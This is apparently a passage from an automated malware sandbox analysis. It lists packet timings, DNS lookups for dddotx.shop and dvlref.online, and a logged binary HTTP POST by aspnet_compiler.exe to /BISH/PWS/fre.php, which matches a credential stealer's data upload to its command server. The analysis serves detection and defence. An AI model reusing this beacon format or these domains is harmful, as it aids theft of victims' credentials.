Dec 2, 2024 14:47:43.723714113 CET	49919	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:43.725852966 CET	49919	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:43.845791101 CET	80	49919	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:43.845850945 CET	49919	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:43.965897083 CET	80	49919	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:45.080813885 CET	80	49919	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:45.081804037 CET	80	49919	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:45.081931114 CET	49919	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:45.126889944 CET	49919	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:45.246793032 CET	80	49919	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:45.520817995 CET	49925	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:45.640753984 CET	80	49925	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:45.640827894 CET	49925	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:45.644150019 CET	49925	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:45.764101982 CET	80	49925	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:45.764255047 CET	49925	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:45.884272099 CET	80	49925	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:46.974601030 CET	80	49925	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:46.975198030 CET	80	49925	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:46.975328922 CET	49925	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:46.975358963 CET	49925	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:47.095294952 CET	80	49925	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:47.119076014 CET	49929	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:47.239039898 CET	80	49929	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:47.239193916 CET	49929	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:47.241712093 CET	49929	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:47.361721039 CET	80	49929	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:47.361856937 CET	49929	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:47.482085943 CET	80	49929	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:48.600413084 CET	80	49929	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:48.602319956 CET	80	49929	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:48.602397919 CET	49929	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:48.609060049 CET	49929	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:48.729038000 CET	80	49929	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:48.814668894 CET	49933	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:48.935386896 CET	80	49933	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:48.935492992 CET	49933	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:48.939040899 CET	49933	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:49.059227943 CET	80	49933	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:49.059293032 CET	49933	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:49.180501938 CET	80	49933	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:50.298413992 CET	80	49933	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:50.298537016 CET	49933	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:50.299552917 CET	80	49933	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:50.299647093 CET	49933	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:50.418562889 CET	80	49933	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:50.456569910 CET	49939	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:50.576555014 CET	80	49939	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:50.576672077 CET	49939	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:50.579684973 CET	49939	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:50.699537039 CET	80	49939	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:50.699604034 CET	49939	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:50.819509029 CET	80	49939	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:51.921442986 CET	80	49939	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:51.921721935 CET	49939	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:51.921943903 CET	80	49939	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:51.922008038 CET	49939	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:52.041979074 CET	80	49939	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:52.076117039 CET	49943	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:52.197812080 CET	80	49943	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:52.197942972 CET	49943	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:52.200128078 CET	49943	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:52.320034981 CET	80	49943	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:52.320146084 CET	49943	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:52.440016031 CET	80	49943	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:53.503700972 CET	80	49943	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:53.503953934 CET	49943	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:53.504715919 CET	80	49943	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:53.504812002 CET	49943	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:53.624048948 CET	80	49943	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:53.655590057 CET	49947	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:53.776262045 CET	80	49947	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:53.776361942 CET	49947	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:53.778733969 CET	49947	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:53.898864031 CET	80	49947	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:53.899018049 CET	49947	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:54.019202948 CET	80	49947	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:55.071896076 CET	80	49947	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:55.072129965 CET	49947	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:55.072686911 CET	80	49947	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:55.072773933 CET	49947	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:55.192162037 CET	80	49947	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:55.211174011 CET	49952	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:55.331280947 CET	80	49952	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:55.331485987 CET	49952	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:55.333815098 CET	49952	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:55.453759909 CET	80	49952	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:55.453881025 CET	49952	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:55.573944092 CET	80	49952	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:56.671284914 CET	80	49952	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:56.671456099 CET	80	49952	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:56.671515942 CET	49952	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:56.671515942 CET	49952	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:56.831623077 CET	49956	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:56.838696003 CET	80	49952	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:57.064874887 CET	80	49956	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:57.065212965 CET	49956	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:57.067392111 CET	49956	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:57.187364101 CET	80	49956	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:57.187443018 CET	49956	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:57.308876038 CET	80	49956	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:58.467120886 CET	80	49956	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:58.467226028 CET	49956	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:58.468103886 CET	80	49956	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:58.468166113 CET	49956	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:58.587191105 CET	80	49956	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:58.618761063 CET	49961	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:58.738753080 CET	80	49961	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:58.738903999 CET	49961	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:58.741235971 CET	49961	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:58.861433983 CET	80	49961	104.21.57.140	192.168.2.7
Dec 2, 2024 14:47:58.861617088 CET	49961	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:47:58.981659889 CET	80	49961	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:00.104140043 CET	80	49961	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:00.104465961 CET	49961	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:00.106061935 CET	80	49961	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:00.106194019 CET	49961	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:00.226500988 CET	80	49961	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:00.252463102 CET	49965	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:00.372490883 CET	80	49965	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:00.372653961 CET	49965	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:00.375097990 CET	49965	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:00.495001078 CET	80	49965	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:00.495168924 CET	49965	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:00.615900993 CET	80	49965	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:01.768826008 CET	80	49965	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:01.769083977 CET	49965	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:01.770493984 CET	80	49965	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:01.770574093 CET	49965	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:01.889194012 CET	80	49965	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:01.919030905 CET	49971	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:02.039048910 CET	80	49971	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:02.039139986 CET	49971	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:02.041645050 CET	49971	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:02.161634922 CET	80	49971	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:02.161787987 CET	49971	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:02.281923056 CET	80	49971	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:04.695626020 CET	80	49971	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:04.695775986 CET	49971	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:04.696706057 CET	80	49971	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:04.696759939 CET	49971	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:04.815767050 CET	80	49971	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:04.835436106 CET	49977	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:04.955482006 CET	80	49977	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:04.955670118 CET	49977	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:04.957745075 CET	49977	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:05.077650070 CET	80	49977	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:05.077723026 CET	49977	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:05.197623014 CET	80	49977	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:06.371306896 CET	80	49977	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:06.371510029 CET	49977	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:06.372694016 CET	80	49977	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:06.372764111 CET	49977	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:06.491725922 CET	80	49977	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:06.506880999 CET	49983	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:06.626919985 CET	80	49983	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:06.627079964 CET	49983	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:06.629559040 CET	49983	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:06.749495983 CET	80	49983	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:06.749600887 CET	49983	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:06.871129990 CET	80	49983	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:08.003021955 CET	80	49983	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:08.003249884 CET	49983	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:08.004205942 CET	80	49983	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:08.004282951 CET	49983	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:08.123210907 CET	80	49983	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:08.159154892 CET	49988	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:08.279381990 CET	80	49988	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:08.279495001 CET	49988	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:08.281708956 CET	49988	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:08.405159950 CET	80	49988	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:08.405253887 CET	49988	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:08.526665926 CET	80	49988	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:09.590373039 CET	80	49988	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:09.590512991 CET	49988	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:09.592452049 CET	80	49988	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:09.592523098 CET	49988	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:09.710510969 CET	80	49988	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:09.726437092 CET	49992	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:09.846486092 CET	80	49992	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:09.846594095 CET	49992	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:09.848752975 CET	49992	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:09.969207048 CET	80	49992	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:09.969316959 CET	49992	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:10.089256048 CET	80	49992	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:11.277231932 CET	80	49992	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:11.277256966 CET	80	49992	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:11.277388096 CET	49992	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:11.277431011 CET	49992	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:11.397388935 CET	80	49992	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:11.412875891 CET	49995	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:11.532921076 CET	80	49995	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:11.533023119 CET	49995	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:11.535180092 CET	49995	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:11.655159950 CET	80	49995	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:11.655286074 CET	49995	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:11.775243044 CET	80	49995	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:12.842406034 CET	80	49995	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:12.842602968 CET	80	49995	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:12.842611074 CET	49995	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:12.842647076 CET	49995	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:12.962661028 CET	80	49995	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:12.993552923 CET	50001	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:13.113826990 CET	80	50001	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:13.113914967 CET	50001	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:13.116568089 CET	50001	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:13.236615896 CET	80	50001	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:13.236850977 CET	50001	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:13.357059956 CET	80	50001	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:14.454298019 CET	80	50001	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:14.454487085 CET	80	50001	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:14.454567909 CET	50001	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:14.469644070 CET	50001	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:14.589750051 CET	80	50001	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:14.756437063 CET	50004	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:14.876544952 CET	80	50004	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:14.876657009 CET	50004	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:14.878838062 CET	50004	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:14.998784065 CET	80	50004	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:14.998847008 CET	50004	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:15.118881941 CET	80	50004	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:16.226205111 CET	80	50004	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:16.226341963 CET	50004	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:16.226754904 CET	80	50004	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:16.226799965 CET	50004	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:16.346267939 CET	80	50004	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:16.365920067 CET	50006	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:16.485795975 CET	80	50006	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:16.485929966 CET	50006	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:16.488158941 CET	50006	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:16.607994080 CET	80	50006	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:16.608052015 CET	50006	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:16.727994919 CET	80	50006	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:17.868932962 CET	80	50006	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:17.869200945 CET	50006	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:17.869821072 CET	80	50006	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:17.869868994 CET	50006	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:17.991478920 CET	80	50006	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:18.051054955 CET	50012	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:18.170999050 CET	80	50012	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:18.171617985 CET	50012	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:18.174500942 CET	50012	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:18.296062946 CET	80	50012	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:18.296109915 CET	50012	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:18.415957928 CET	80	50012	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:19.524944067 CET	80	50012	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:19.524957895 CET	80	50012	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:19.525063992 CET	50012	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:19.525145054 CET	50012	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:19.645003080 CET	80	50012	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:19.663697958 CET	50016	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:19.783699989 CET	80	50016	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:19.783807993 CET	50016	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:19.786144972 CET	50016	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:19.906075954 CET	80	50016	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:19.906174898 CET	50016	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:20.026098967 CET	80	50016	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:21.192187071 CET	80	50016	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:21.192264080 CET	50016	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:21.194297075 CET	80	50016	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:21.194345951 CET	50016	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:21.312249899 CET	80	50016	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:21.424498081 CET	50021	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:21.544500113 CET	80	50021	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:21.544589996 CET	50021	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:21.546886921 CET	50021	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:21.666977882 CET	80	50021	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:21.667040110 CET	50021	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:21.787164927 CET	80	50021	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:22.914364100 CET	80	50021	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:22.915671110 CET	80	50021	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:22.915780067 CET	50021	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:22.915810108 CET	50021	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:23.035716057 CET	80	50021	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:23.104159117 CET	50025	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:23.224070072 CET	80	50025	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:23.224206924 CET	50025	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:23.226758003 CET	50025	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:23.346642017 CET	80	50025	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:23.346751928 CET	50025	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:23.466885090 CET	80	50025	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:24.582113981 CET	80	50025	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:24.582221031 CET	50025	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:24.583482027 CET	80	50025	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:24.583545923 CET	50025	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:24.703176022 CET	80	50025	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:24.743247032 CET	50031	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:24.863322973 CET	80	50031	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:24.863507986 CET	50031	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:24.865756989 CET	50031	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:24.985713005 CET	80	50031	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:24.985940933 CET	50031	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:25.105977058 CET	80	50031	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:26.191217899 CET	80	50031	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:26.191427946 CET	50031	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:26.192574978 CET	80	50031	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:26.192671061 CET	50031	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:26.311419010 CET	80	50031	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:26.336714983 CET	50034	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:26.456655025 CET	80	50034	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:26.456861019 CET	50034	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:26.459008932 CET	50034	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:26.578963995 CET	80	50034	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:26.579169035 CET	50034	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:26.699193001 CET	80	50034	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:27.863046885 CET	80	50034	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:27.863215923 CET	50034	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:27.864159107 CET	80	50034	104.21.57.140	192.168.2.7
Dec 2, 2024 14:48:27.864223003 CET	50034	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:48:27.983459949 CET	80	50034	104.21.57.140	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 14:46:20.243987083 CET	52266	53	192.168.2.7	1.1.1.1
Dec 2, 2024 14:46:21.016344070 CET	53	52266	1.1.1.1	192.168.2.7
Dec 2, 2024 14:46:27.129915953 CET	56088	53	192.168.2.7	1.1.1.1
Dec 2, 2024 14:46:27.571492910 CET	53	56088	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 14:46:20.243987083 CET	192.168.2.7	1.1.1.1	0xa50e	Standard query (0)	dddotx.shop	A (IP address)	IN (0x0001)	false
Dec 2, 2024 14:46:27.129915953 CET	192.168.2.7	1.1.1.1	0x2ce	Standard query (0)	dvlref.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 14:46:21.016344070 CET	1.1.1.1	192.168.2.7	0xa50e	No error (0)	dddotx.shop	104.21.12.202	A (IP address)	IN (0x0001)	false
Dec 2, 2024 14:46:21.016344070 CET	1.1.1.1	192.168.2.7	0xa50e	No error (0)	dddotx.shop	172.67.153.63	A (IP address)	IN (0x0001)	false
Dec 2, 2024 14:46:27.571492910 CET	1.1.1.1	192.168.2.7	0x2ce	No error (0)	dvlref.online	104.21.57.140	A (IP address)	IN (0x0001)	false
Dec 2, 2024 14:46:27.571492910 CET	1.1.1.1	192.168.2.7	0x2ce	No error (0)	dvlref.online	172.67.164.23	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dddotx.shop

dvlref.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:27.704499960 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 192 Connection: close
